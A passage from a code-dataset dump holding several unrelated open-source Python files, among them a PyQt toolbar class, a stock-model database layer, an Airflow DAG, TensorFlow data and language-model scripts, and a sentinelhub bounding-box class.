add_action_descr (self, name, func, icon = None, descr = \"\") :\n\t\t\"\"\"Add a new action from its description.\n\t\t\"\"\"\n\t\tif self._action_bar is None :\n\t\t\tself._actions.append( (name,func,icon,descr) )\n\t\telse :\n\t\t\tself._actions.append(self.create_action(name,func,icon,descr) )\n\t\n\tdef add_action (self, action) :\n\t\t\"\"\"Add a new action to the GUI.\n\t\t\"\"\"\n\t\tself._actions.append(action)\n\t\tif self._action_bar is not None :\n\t\t\tself._action_bar.addAction(action)\n\t\n\tdef create_tool (self, name, func, draw_func, icon, descr) :\n\t\t\"\"\"Create a new tool from its description.\n\t\tassert tool_bar is not None.\n\t\t\"\"\"\n\t\ttoolbar = self._tool_bar\n\t\ttool = SelectTool(toolbar,name,draw_func)\n\t\ttoolbar.addAction(tool)\n\t\tif icon is not None :\n\t\t\tif isinstance(icon,QIcon) :\n\t\t\t\ttool.setIcon(icon)\n\t\t\telse :\n\t\t\t\ttool.setIcon(QIcon(icon) )\n\t\tif descr == \"\" :\n\t\t\ttool.setToolTip(name)\n\t\telse :\n\t\t\ttool.setToolTip(descr)\n\t\t\n\t\ttool.connect(tool,SIGNAL(\"elm selected\"),func)\n\t\treturn tool\n\t\n\tdef add_tool_descr (self, name, func, draw_func, icon = None, descr = \"\") :\n\t\t\"\"\"Add a new tool from its description.\n\t\t\"\"\"\n\t\tif self._tool_bar is None :\n\t\t\tself._tools.append( (name,func,draw_func,icon,descr) )\n\t\telse :\n\t\t\tself._tools.append(self.create_tool(name,func,draw_func,icon,descr) )\n\t\n\tdef add_tool (self, tool) :\n\t\t\"\"\"Add a new tool to the GUI.\n\t\t\"\"\"\n\t\tself._tools.append(tool)\n\t\tif self._tool_bar is not None :\n\t\t\tself._tool_bar.addAction(tool)\n\t\n\t###############################################\n\t#\n\t#\t\tsubclass ElmGUI\n\t#\n\t###############################################\n\tdef setup_ui (self) :\n\t\tif ElmGUI.setup_ui(self) :\n\t\t\tself._action_bar = QToolBar(\"action_%s\" % self._name)\n\t\t\tfor i,action in enumerate(self._actions) :\n\t\t\t\tif not isinstance(action,QAction) :\n\t\t\t\t\taction = self.create_action(*action)\n\t\t\t\t\tself._actions[i] = action\n\t\t\t\tself._action_bar.addAction(action)\n\t\t\t\n\t\t\tself._tool_bar = QToolBar(\"tool_%s\" % self._name)\n\t\t\tfor i,tool in enumerate(self._tools) :\n\t\t\t\tif not isinstance(tool,QAction) :\n\t\t\t\t\ttool = self.create_tool(*tool)\n\t\t\t\t\tself._tools[i] = tool\n\t\t\t\tself._tool_bar.addAction(tool)\n\t\t\t\n\t\t\treturn True\n\t\telse :\n\t\t\treturn False\n\t\n\tdef install (self, main_window) :\n\t\tElmGUI.install(self,main_window)\n\t\tif len(self._action_bar.actions() ) > 0 :\n\t\t\tself.add_action_bar(main_window,self._action_bar)\n\t\tif len(self._tool_bar.actions() ) > 0 :\n\t\t\tself.add_tool_bar(main_window,\n\t\t\t self._tool_bar,\n\t\t\t self._tool_bar_position)\n\t\n\tdef uninstall (self, main_window) :\n\t\tElmGUI.uninstall(self,main_window)\n\t\tif len(self._action_bar.actions() ) > 0 :\n\t\t\tself.remove_bar(main_window,self._action_bar)\n\t\tif len(self._tool_bar.actions() ) > 0 :\n\t\t\tself.remove_bar(main_window,self._tool_bar)\n\n","repo_name":"jldinh/vplants","sub_path":"pglviewer/src/pglviewer/elm_gui.py","file_name":"elm_gui.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1567677417","text":"import pandas as pd\nfrom stocker_app.stock_database.schemas import database, Price_History, PredictionModel, ModelStatus, App_Setting\nfrom stocker_app.utils import database_utils as dbu\nfrom time import time\nclass DAO():\n def __init__(self):\n 
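# (added note) one Session is opened here and shared for the DAO's lifetime;\n        # create_tables() is assumed to be idempotent, so repeated construction is safe.\n        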
try:\n            database.create_tables()\n            self.session = database.get_session()\n        except Exception as ex:\n            print('failed to get session', ex)\n        finally:\n            print('DAO initialized')\n\n    def set_setting(self, key, value):\n        m_setting = self.session.query(App_Setting).filter(App_Setting.key == key).first()\n        if m_setting != None:\n            m_setting.value = value\n        else:\n            self.session.add(App_Setting(**{\n                'key': key,\n                'value': value\n            }))\n        self.session.commit()\n    \n    def get_setting(self, key):\n        m_setting = self.session.query(App_Setting).filter(App_Setting.key == key).first()\n        if m_setting != None:\n            return m_setting.value\n        else:\n            self.session.add(App_Setting(**{\n                'key': key,\n                'value': -1\n            }))\n            self.session.commit()\n            return -1\n\n    def convert_prediction_model(self, modelobj):\n        return {\n            'hash_id': modelobj.id,\n            'start_date': modelobj.start_date,\n            'ticker': modelobj.ticker,\n            'prior': modelobj.prior,\n            'ma':modelobj.ma\n        }\n\n    def save_prediction_model(self, model_params, model):\n        try:\n            hash_id = model_params.get_hash()\n            record = PredictionModel(**{\n                'model_id': hash_id,\n                'ticker': model_params.ticker,\n                'prediction_start': model_params.date,\n                'changepoint_prior_scale': model_params.changepoint_prior_scale,\n                'lag': model_params.lag,\n                'model_pkl': model,\n                'daily_seasonality':model_params.daily_seasonality,\n                'weekly_seasonality':model_params.weekly_seasonality,\n                'monthly_seasonality':model_params.monthly_seasonality,\n                'yearly_seasonality':model_params.yearly_seasonality,\n                'quarterly_seasonality':model_params.quarterly_seasonality,\n                'training_years': model_params.training_years\n            })\n            self.session.add(record)\n            self.session.commit()\n            if self.update_model_status(model_id = hash_id, status=1) == False:\n                self.session.rollback()\n                return False\n        except Exception as ex:\n            print(ex)\n            self.session.rollback()\n            return False\n        finally:\n            self.session.close()\n        return True\n\n    def update_model_status(self, model_id, status=0):\n        try:\n            status_db = self.session.query(ModelStatus).filter(ModelStatus.model_id == model_id).first()\n            if status_db != None:\n                status_db.status = status\n            else:\n                record = ModelStatus(**{\n                    'model_id': model_id,\n                    'status': status\n                })\n                self.session.add(record)\n            self.session.commit()\n        except Exception as ex:\n            self.session.rollback()\n            print('[Update Model Status]\\n', ex)\n            return False\n        finally:\n            self.session.close()\n        print('Update model %s as %s' %(model_id, status))\n        return True\n\n    def get_model_status(self, model_id):\n        try:\n            status_db = self.session.query(ModelStatus).filter(ModelStatus.model_id == model_id).first()\n            if status_db != None:\n                print('Status of %s: %s' % (status_db.model_id, status_db.status))\n                return {\n                    'model_id':status_db.model_id,\n                    'status': status_db.status\n                }\n            else:\n                self.update_model_status(model_id=model_id)\n                return {\n                    'model_id':model_id,\n                    'status': 0\n                }\n\n        except Exception as ex:\n            print(ex)\n            return False\n    \n    def get_prediction_model(self, model_id):\n        try:\n            model = self.session.query(PredictionModel).filter(PredictionModel.model_id == model_id).first()\n            if model == None:\n                return None\n            else:\n                print('Model Queried Success:', model)\n                return model\n        except Exception as ex:\n            print('Exception while getting prediction model, model_id: %s' % model_id, ex)\n        finally:\n            self.session.close()\n    \n    def get_prediction_models(self):\n        models = None\n        try:\n            query = self.session.query(PredictionModel)\n            models = pd.read_sql(query.statement, query.session.bind)\n            print('Model List 
Queried Success:', models)\n        except Exception as ex:\n            print('Exception while getting prediction models', ex)\n        finally:\n            self.session.close()\n        return models\n\n    def get_model_params(self, model_id):\n        model = None\n        try:\n            model = self.session.query(PredictionModel).filter(PredictionModel.model_id == model_id).first()\n            if model == None:\n                return None\n            else:\n                print('Model Params Queried Success:', model)\n        except Exception as ex:\n            print('Exception while getting model params, model_id: %s' % model_id, ex)\n        finally:\n            self.session.close()\n        return model","repo_name":"trungnguyen27/stock-forecast-service","sub_path":"stocker_app/stock_database/DAO.py","file_name":"DAO.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"786894245","text":"import json\nfrom airflow import DAG\nfrom datetime import datetime, timedelta, date\nfrom airflow.operators.python import PythonOperator\nimport boto3\nimport logging\n\ndefault_args = {\n    \"owner\": \"seb\",\n    \"email_on_failure\": False,\n    \"retries\": 1,\n    \"retry_delay\": timedelta(minutes=1),\n    # \"start_date\": datetime(2022, 7, 20),\n}\n\n\ndef dummy_function(ds, **kwargs):\n    print(ds)\n    x = 1\n\n\ndef trigger_extractor_lambda(ds, **kwargs):\n    logging.info(ds)\n    logging.info(date.fromisoformat(ds))\n    lambdaclient = boto3.client(\"lambda\", \"us-east-1\")\n    payload = {\n        \"dates\": {\n            \"start\": f\"{date.fromisoformat(ds)-timedelta(weeks=1)}\",\n            \"end\": f\"{date.fromisoformat(ds)}\",\n        }\n    }\n    lambdaclient.invoke(\n        FunctionName=\"ufc-extractor\",\n        InvocationType=\"Event\",\n        Payload=json.dumps(payload),\n    )\n\n\ndef trigger_t1_lambda(ds, **kwargs):\n    lambdaclient = boto3.client(\"lambda\", \"us-east-1\")\n    payload = {\n        \"dates\": {\n            \"start\": f\"{date.fromisoformat(ds)-timedelta(weeks=1)}\",\n            \"end\": f\"{date.fromisoformat(ds)}\",\n        }\n    }\n    lambdaclient.invoke(\n        FunctionName=\"ufc-t1\",\n        InvocationType=\"Event\",\n        Payload=json.dumps(payload),\n    )\n\n\nwith DAG(\n    \"ufc-main-dag\",\n    default_args=default_args,\n    schedule_interval=\"@weekly\",\n    catchup=True,\n    start_date=datetime(1994, 1, 1),\n) as dag:\n    dummy_task = PythonOperator(\n        task_id=\"dummy_task\",\n        python_callable=dummy_function,\n        dag=dag,\n        provide_context=True,\n    )\n    logging.info(\"ohai\")\n    # lambda pulls raw data into S3\n    extractor_task = PythonOperator(\n        task_id=\"extractor_task\",\n        python_callable=trigger_extractor_lambda,\n        provide_context=True,\n        dag=dag,\n    )\n\n    t1_task = PythonOperator(\n        task_id=\"t1_task\",\n        python_callable=trigger_t1_lambda,\n        provide_context=True,\n        dag=dag,\n    )\n\n    # run tests against structure of raw data\n\n    # lambda runs first transformation\n\n    # run tests against great expectations\n\n    # lambda creates temp tables and gets redshift to pull data into first table\n\n    # lambda massages data into final format\n\n    # run tests against great expectations\n\n    # merge into normal data\n\n    # refresh materialized views\n\ndummy_task >> extractor_task >> t1_task\n","repo_name":"chamley/UFC","sub_path":"src/airflow/main-dag.py","file_name":"main-dag.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18704185314","text":"change = eval(input('Enter change: '))\n\nquarters = change // 25\nchange %= 25\n\ndimes = change // 10\nchange %= 10\n\nnickels = change // 5\nchange %= 5\n\npennies = change // 1\n\nprint('Quarters:', 
quarters)\nprint('Dimes: ', dimes)\nprint('Nickels: ', nickels)\nprint('Pennies: ', pennies)","repo_name":"MoMagdy14/advanced-programming-python","sub_path":"Chapter_03_Numbers/exercise_18.py","file_name":"exercise_18.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"2041009729","text":"\"\"\"\nCapsule Networks as Recurrent Models of Grouping and Segmentation\n\nExperiment 2: The role of recurrent processing\n\nThis script creates tfrecords files based on the stim_maker_fn class\n(see batchmaker.py).\nThe tfrecords files are called in the input_fn of the Estimator API\n(see capser_input_fn.py).\n\nThis code is inspired by the following youtube-video and code. Have a look if\nyou want to understand the details.\nhttps://www.youtube.com/watch?v=oxrcZ9uUblI\nhttps://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/18_TFRecords_Dataset_API.ipynb\n\n@author: Lynn Schmittwilken\n\"\"\"\n\nimport sys\nimport os\nimport tensorflow as tf\nimport numpy as np\nfrom parameters import parameters\nfrom batchmaker import stim_maker_fn\n\n\n##################################\n# Extra parameters: #\n##################################\ntraining = 0\ntesting = 1\ntesting_crowding = 1\n\n# Choose how many conditions should be included\nn_idx = parameters.n_idx\n\n\n##################################\n# Helper functions: #\n##################################\ndef wrap_int64(value):\n output = tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n return output\n\ndef wrap_bytes(value):\n output = tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n return output\n\ndef print_progress(count, total):\n percent_complete = float(count) / total\n msg = \"\\r- Progress: {0:.1%}\".format(percent_complete)\n # Print it.\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n\n##################################\n# tfrecords function: #\n##################################\ndef make_tfrecords(out_path, stim_maker, state, shape_types, n_samples,\n train_procedure='random', stim_idx=None, reduce_df=False):\n '''\n Function to create tfrecord files based on stim_maker class\n \n Parameters\n ----------\n out_path: string\n Full data path including file name to which the dataset should be\n saved, e.g. 'datapath/filename.tfrecords'\n stim_maker: class\n Output of stim_maker_fn defined in batchmaker.py which defines\n the train and test stimuli\n state: string\n Tell the network whether it should create a training or test dataset\n by using either state='training' or state='testing'\n shape_types: list of ints\n Pass a list with all shapeIDs corresponding to stim_maker class.\n For training, it must be continuous from 0 to max\n train_procedure: string\n Train procedure determines which and how many stimuli are\n used for training. In this project, always use\n train_procedure='random' in which case only shape_1 is\n used for training and gets randomly selected from all\n shape_types\n n_samples: int\n Full sample size of dataset\n stim_idx: int\n Based on the stim_idx, a test condition can be chosen. If\n stim_idx=None, a random condition is used. 
If stim_idx=0 the\n            vernier-alone condition is chosen; if stim_idx=1 the crowding\n            condition is chosen (=single flanker condition); if stim_idx=2 the\n            uncrowding condition is chosen (multiple flankers condition either\n            using flankers of one or two different types); if stim_idx=3 the\n            control condition is chosen (no-crowding condition due to\n            sufficient spacing between flankers and vernier)\n        reduce_df: bool\n            If reduce_df=False the stimulus group is placed randomly within\n            the image. If reduce_df=True the stimulus group is still randomly\n            placed within the image, however, the possibility of placement on\n            the x-axis is controlled for the number of shape repetitions.\n            This prevents big stimulus groups from being detected more easily\n            just because their positioning on the x-axis is less variable\n    '''\n    \n    print(\"\\nConverting: \" + out_path)\n    \n    # Open a TFRecordWriter for the output-file.\n    with tf.python_io.TFRecordWriter(out_path) as writer:\n\n        # Create images one by one using stim_maker and save them\n        for i in range(n_samples):\n            print_progress(count=i, total=n_samples - 1)\n            \n            # Either create training or testing dataset\n            if state=='training':\n                [shape_1_images, shape_2_images, shapelabels, vernierlabels, nshapeslabels,\n                 nshapeslabels_idx, x_shape_1, y_shape_1, x_shape_2, y_shape_2] = stim_maker.makeTrainBatch(\n                shape_types, 1, train_procedure, reduce_df)\n\n            elif state=='testing':\n                # The shape_types involve all configs in a dict (see parameters.py)\n                test_configs = shape_types\n                if len(test_configs) == 1:\n                    # Either use the single test_config that is given:\n                    config_idx = list(test_configs)[0]\n                    chosen_config = test_configs[config_idx]\n                else:\n                    # Or choose one config randomly from all configs given for\n                    # the validation set:\n                    config_idx = np.random.randint(0, len(test_configs))\n                    chosen_config = test_configs[str(config_idx)]\n\n                [shape_1_images, shape_2_images, shapelabels, vernierlabels, nshapeslabels,\n                 nshapeslabels_idx, x_shape_1, y_shape_1, x_shape_2, y_shape_2] = stim_maker.makeTestBatch(\n                chosen_config, 1, stim_idx, reduce_df)\n\n            # Convert the image to raw bytes.\n            # Note: for this project, not all variables are needed\n            shape_1_images_bytes = shape_1_images.tostring()\n            shape_2_images_bytes = shape_2_images.tostring()\n            shapelabels_bytes = shapelabels.tostring()\n            nshapeslabels_bytes = nshapeslabels.tostring()\n            nshapeslabels_idx_bytes = nshapeslabels_idx.tostring()\n            vernierlabels_bytes = vernierlabels.tostring()\n            x_shape_1_bytes = x_shape_1.tostring()\n            y_shape_1_bytes = y_shape_1.tostring()\n            x_shape_2_bytes = x_shape_2.tostring()\n            y_shape_2_bytes = y_shape_2.tostring()\n\n            # Create a dict with the data to save in the TFRecords file\n            data = {'shape_1_images': wrap_bytes(shape_1_images_bytes),\n                    'shape_2_images': wrap_bytes(shape_2_images_bytes),\n                    'shapelabels': wrap_bytes(shapelabels_bytes),\n                    'nshapeslabels': wrap_bytes(nshapeslabels_bytes),\n                    'nshapeslabels_idx': wrap_bytes(nshapeslabels_idx_bytes),\n                    'vernierlabels': wrap_bytes(vernierlabels_bytes),\n                    'x_shape_1': wrap_bytes(x_shape_1_bytes),\n                    'y_shape_1': wrap_bytes(y_shape_1_bytes),\n                    'x_shape_2': wrap_bytes(x_shape_2_bytes),\n                    'y_shape_2': wrap_bytes(y_shape_2_bytes)}\n\n            # Wrap the data as TensorFlow Features.\n            feature = tf.train.Features(feature=data)\n\n            # Wrap again as a TensorFlow Example.\n            example = tf.train.Example(features=feature)\n\n            # Serialize the data.\n            serialized = example.SerializeToString()\n\n            # Write the serialized data to the TFRecords file.\n            
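# (added note) a reader, e.g. capser_input_fn.py, is expected to mirror this layout:\n            # parse each record with tf.parse_single_example using a FixedLenFeature([], tf.string)\n            # per key, then recover the arrays with tf.decode_raw and reshape them.\n            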
writer.write(serialized)\n    return\n\n\n###################################\n#       Create tfrecords files:   #\n###################################\nprint('\\n-------------------------------------------------------')\nprint('Creating tfrecords files of type:', parameters.train_procedure)\n\nstim_maker = stim_maker_fn(parameters.im_size, parameters.shape_size, parameters.bar_width, parameters.offset)\n\nif not os.path.exists(parameters.data_path):\n    os.mkdir(parameters.data_path)\n\n\n# Create the training set:\nif training:\n    mode = 'training'\n    shape_types_train = parameters.shape_types\n    train_procedure = 'random'\n    make_tfrecords(parameters.train_data_path, stim_maker, mode, shape_types_train,\n                   parameters.n_train_samples, train_procedure, reduce_df=parameters.reduce_df)\n    print('\\n-------------------------------------------------------')\n    print('Finished creation of training set')\n    print('-------------------------------------------------------')\n\n\n# Create the validation and the test set that uses the same stimuli as in\n# the training set:\nif testing:\n    mode = 'training'\n    shape_types_train = parameters.shape_types\n    train_procedure = 'random'\n\n    # Validation set:\n    make_tfrecords(parameters.val_data_path, stim_maker, mode, shape_types_train,\n                   parameters.n_test_samples, train_procedure, reduce_df=parameters.reduce_df)\n\n    # Individual test sets:\n    for i in range(len(parameters.test_data_paths)):\n        # We use +1 here to skip a vernier-vernier configuration\n        chosen_shape = shape_types_train[i+1]\n        test_file_path = parameters.test_data_paths[i]\n        make_tfrecords(test_file_path, stim_maker, mode, chosen_shape,\n                       parameters.n_test_samples, train_procedure, reduce_df=parameters.reduce_df)\n    print('\\n-------------------------------------------------------')\n    print('Finished creation of regular validation and test sets')\n    print('-------------------------------------------------------')\n\n\n# Create the validation and the test set that uses vernier-alone and flankers\n# test stimuli:\nif testing_crowding:\n    mode = 'testing'\n    test_configs = parameters.test_configs[0]\n    \n    # Validation sets:\n    make_tfrecords(parameters.val_crowding_data_path, stim_maker, mode, test_configs,\n                   parameters.n_test_samples, reduce_df=parameters.reduce_df)\n\n    # Individual test sets:\n    for i in range(len(test_configs)):\n        test_config = {str(i): test_configs[str(i)]}\n        test_data_path = parameters.test_crowding_data_paths[i]\n        if not os.path.exists(test_data_path):\n            os.mkdir(test_data_path)\n        for stim_idx in range(n_idx):\n            test_file_path = test_data_path + '/' + str(stim_idx) + '.tfrecords'\n            make_tfrecords(test_file_path, stim_maker, mode, test_config,\n                           parameters.n_test_samples, stim_idx=stim_idx, \n                           reduce_df=parameters.reduce_df)\n    print('\\n-------------------------------------------------------')\n    print('Finished creation of crowding validation and test sets')\n    print('-------------------------------------------------------')\n","repo_name":"adriendoerig/Capsule-networks-as-recurrent-models-of-grouping-and-segmentation","sub_path":"experiment2/make_tfrecords.py","file_name":"make_tfrecords.py","file_ext":"py","file_size_in_byte":10700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73619855593","text":"import tensorflow as tf\nimport numpy as np\n\nclass LanguageModel:\n    def __init__(self, args, infer=False):\n\n        import tensorflow as tf\n        from tensorflow.python.ops import seq2seq, rnn_cell\n\n        if infer:\n            args.batch_size = 1\n            args.seq_length = 
1\n\n gru = rnn_cell.GRUCell(args.rnn_state_size)\n self.cell = rnn_cell.MultiRNNCell([gru] * args.stacked_rnn_layers)\n\n self.input_data = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) # [batch_size, seq_length]\n self.targets = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) # [batch_size, seq_length]\n self.initial_state = self.cell.zero_state(args.batch_size, tf.float32) # [batch_size]\n\n with tf.variable_scope('rnnlm'):\n softmax_w = tf.get_variable(\"softmax_w\", [args.rnn_state_size, args.vocab_size]) # [rnn_state_size, vocab_size]\n softmax_b = tf.get_variable(\"softmax_b\", [args.vocab_size]) # [vocab_size]\n\n word_embedding = tf.get_variable(\"embedding\", [args.vocab_size, args.rnn_state_size]) # [vocab_size, rnn_state_size]\n inputs = tf.split(1, args.seq_length, tf.nn.embedding_lookup(word_embedding, self.input_data))\n inputs = [tf.squeeze(input_, [1]) for input_ in inputs]\n\n def loop(prev, _): # [batch_size, rnn_state_size]\n prev = tf.matmul(prev, softmax_w) + softmax_b # [batch_size, vocab_size]\n prev_symbol = tf.stop_gradient(tf.argmax(prev, 1)) # [batch_size]\n return tf.nn.embedding_lookup(word_embedding, prev_symbol)\n\n outputs, last_state = seq2seq.rnn_decoder(inputs, self.initial_state, self.cell, loop_function=loop if infer else None, scope='rnnlm')\n # outputs: [batch_size, rnn_state_size] * seq_length\n\n output = tf.reshape(tf.concat(1, outputs), [-1, args.rnn_state_size])\n\n self.logits = tf.matmul(output, softmax_w) + softmax_b # [batch_size * seq_length, vocab_size]\n self.probs = tf.nn.softmax(self.logits)\n\n\n\n loss = seq2seq.sequence_loss_by_example([self.logits],\n [tf.reshape(self.targets, [-1])], # [batch_size * seq_length]\n [tf.ones([args.batch_size * args.seq_length])],\n args.vocab_size)\n\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n self.cost = tf.reduce_sum(loss) / args.batch_size / args.seq_length\n\n tf.summary.scalar(\"cost\", self.cost)\n\n self.final_state = last_state\n self.lr = tf.Variable(0.0, trainable=False)\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars), args.grad_clip)\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=self.global_step)\n\n\n\n def sample(self, sess, chars, vocab, num=200, prime='私は', sampling_type=1) -> str:\n state = self.cell.zero_state(1, tf.float32).eval()\n for char in prime[:-1]:\n x = np.zeros((1, 1))\n x[0, 0] = vocab[char]\n feed = {self.input_data: x, self.initial_state:state}\n [state] = sess.run([self.final_state], feed)\n\n def weighted_pick(weights):\n t = np.cumsum(weights)\n s = np.sum(weights)\n return(int(np.searchsorted(t, np.random.rand(1)*s)))\n\n ret = prime\n char = prime[-1]\n for n in range(num):\n x = np.zeros((1, 1))\n x[0, 0] = vocab.get(char)\n feed = {self.input_data: x, self.initial_state:state}\n [probs, state] = sess.run([self.probs, self.final_state], feed)\n p = probs[0]\n\n if sampling_type == 0:\n sample = np.argmax(p)\n elif sampling_type == 2:\n if char == ' ':\n sample = weighted_pick(p)\n else:\n sample = np.argmax(p)\n else: # sampling_type == 1 default:\n sample = weighted_pick(p)\n\n pred = chars[sample]\n ret += pred\n char = pred\n\n return ret\n\n\n\n\ndef run():\n #train()\n 
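# (added note) sample() above is a method of LanguageModel and needs (sess, chars, vocab);\n    # this bare call is a placeholder and would fail if executed as-is.\n    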
sample()\n\n","repo_name":"alatani/midi_gen","sub_path":"deepdazai_old/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15141212889","text":"def main(l):\r\n counts = {}\r\n answer = 0\r\n for nb in l:\r\n counts[nb] = counts.get(nb, 0) + 1\r\n for a in sorted(counts.keys(), reverse=True):\r\n b = (1 << a.bit_length()) - a\r\n c_a = counts[a]\r\n c_b = counts.get(b)\r\n if c_b:\r\n if a == b:\r\n answer += c_a // 2\r\n else:\r\n increment = c_a if c_a < c_b else c_b\r\n counts[a] -= increment\r\n counts[b] -= increment\r\n answer += increment\r\n\r\n return answer\r\n\r\n\r\nif __name__ == '__main__':\r\n input()\r\n print(main(map(int, input().split())))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/B/4182040.py","file_name":"4182040.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"447155320","text":"\"\"\"Module implementing geometry classes.\"\"\"\n\nfrom __future__ import annotations\n\nimport contextlib\nimport warnings\nfrom abc import ABCMeta, abstractmethod\nfrom math import ceil\nfrom typing import Callable, Dict, Iterator, Tuple, TypeVar, Union\n\nimport shapely.geometry\nimport shapely.geometry.base\nimport shapely.ops\nimport shapely.wkt\nfrom shapely.errors import GeometryTypeError\nfrom shapely.geometry import MultiPolygon, Polygon\nfrom typing_extensions import TypeAlias\n\nfrom .constants import CRS\nfrom .exceptions import SHDeprecationWarning\nfrom .geo_utils import transform_point\n\nSelf = TypeVar(\"Self\", bound=\"_BaseGeometry\")\nBBoxInputType: TypeAlias = Union[\n Tuple[float, float, float, float], Tuple[Tuple[float, float], Tuple[float, float]], Dict[str, float]\n]\n\n\nclass _BaseGeometry(metaclass=ABCMeta):\n \"\"\"Base geometry class\"\"\"\n\n def __init__(self, crs: CRS):\n \"\"\"\n :param crs: Coordinate reference system of the geometry\n \"\"\"\n self._crs = CRS(crs)\n\n @property\n def crs(self) -> CRS:\n \"\"\"Returns the coordinate reference system (CRS)\n\n :return: Coordinate reference system Enum\n \"\"\"\n return self._crs\n\n @property\n @abstractmethod\n def geometry(self) -> Polygon | MultiPolygon:\n \"\"\"An abstract property - every subclass must implement geometry property\"\"\"\n\n @property\n def geojson(self) -> dict:\n \"\"\"Returns representation in a GeoJSON format. Use `json.dump` for writing it to file.\n\n :return: A dictionary in GeoJSON format\n \"\"\"\n return self.get_geojson(with_crs=True)\n\n def get_geojson(self, with_crs: bool = True) -> dict:\n \"\"\"Returns representation in a GeoJSON format. 
Use `json.dump` for writing it to file.\n\n        :param with_crs: A flag indicating if GeoJSON dictionary should contain CRS part\n        :return: A dictionary in GeoJSON format\n        \"\"\"\n        geometry_geojson = shapely.geometry.mapping(self.geometry)\n\n        if with_crs:\n            return {**self._crs_to_geojson(), **geometry_geojson}\n        return geometry_geojson\n\n    def _crs_to_geojson(self) -> dict:\n        \"\"\"Helper method which generates part of GeoJSON format related to CRS\"\"\"\n        return {\"crs\": {\"type\": \"name\", \"properties\": {\"name\": f\"urn:ogc:def:crs:EPSG::{self.crs.value}\"}}}\n\n    @property\n    def wkt(self) -> str:\n        \"\"\"Transforms geometry object into `Well-known text` format\n\n        :return: string in WKT format\n        \"\"\"\n        return self.geometry.wkt\n\n    @abstractmethod\n    def transform(self: Self, crs: CRS, always_xy: bool = True) -> Self:\n        \"\"\"Transforms geometry from current CRS to target CRS.\"\"\"\n\n    @abstractmethod\n    def apply(self: Self, operation: Callable[[float, float], tuple[float, float]]) -> Self:\n        \"\"\"Applies a function to each vertex of a geometry object.\"\"\"\n\n\nclass BBox(_BaseGeometry):\n    \"\"\"Class representing a bounding box in a given CRS.\n\n    Throughout the sentinelhub package this class serves as the canonical representation of a bounding box. It can be\n    initialized from multiple representations:\n\n    1) `((min_x, min_y), (max_x, max_y))`\n    2) `(min_x, min_y, max_x, max_y)`\n    3) `{\"min_x\": min_x, \"max_x\": max_x, \"min_y\": min_y, \"max_y\": max_y}`\n\n    Note that the BBox coordinate system depends on the `crs` parameter:\n\n    - In case of `constants.CRS.WGS84` axis x represents longitude and axis y represents latitude.\n    - In case of `constants.CRS.POP_WEB` axis x represents easting and axis y represents northing.\n    - In case of `constants.CRS.UTM_*` axis x represents easting and axis y represents northing.\n    \"\"\"\n\n    def __init__(self, bbox: BBoxInputType, crs: CRS):\n        \"\"\"\n        :param bbox: A bbox in any valid representation\n        :param crs: Coordinate reference system of the bounding box\n        \"\"\"\n        x_fst, y_fst, x_snd, y_snd = self._to_tuple(bbox)\n        self.min_x, self.max_x = min(x_fst, x_snd), max(x_fst, x_snd)\n        self.min_y, self.max_y = min(y_fst, y_snd), max(y_fst, y_snd)\n\n        super().__init__(crs)\n\n    @classmethod\n    def _to_tuple(cls, bbox: BBoxInputType) -> tuple[float, float, float, float]:\n        \"\"\"Converts the input bbox representation (see the constructor docstring for a list of valid representations)\n        into a flat tuple. Also supports `list` objects in places where `tuple` is expected.\n\n        :param bbox: A bbox in one of the forms listed in the class description.\n        :return: A flat tuple `(min_x, min_y, max_x, max_y)`\n        :raises: TypeError\n        \"\"\"\n        if isinstance(bbox, (tuple, list)):\n            return cls._tuple_from_list_or_tuple(bbox)\n        if isinstance(bbox, str): # type: ignore[unreachable]\n            return cls._tuple_from_str(bbox) # type: ignore[unreachable]\n        if isinstance(bbox, dict):\n            return cls._tuple_from_dict(bbox)\n        if isinstance(bbox, BBox): # type: ignore[unreachable]\n            return cls._tuple_from_bbox(bbox)\n        if isinstance(bbox, shapely.geometry.base.BaseGeometry):\n            warnings.warn(\n                \"Initializing `BBox` objects from `shapely` geometries will no longer be possible in future\"\n                \" versions. Use the `bounds` property of the `shapely` geometry to initialize the `BBox` instead.\",\n                category=SHDeprecationWarning,\n                stacklevel=2,\n            )\n            return bbox.bounds\n        raise TypeError(\n            \"Unable to process `BBox` input. 
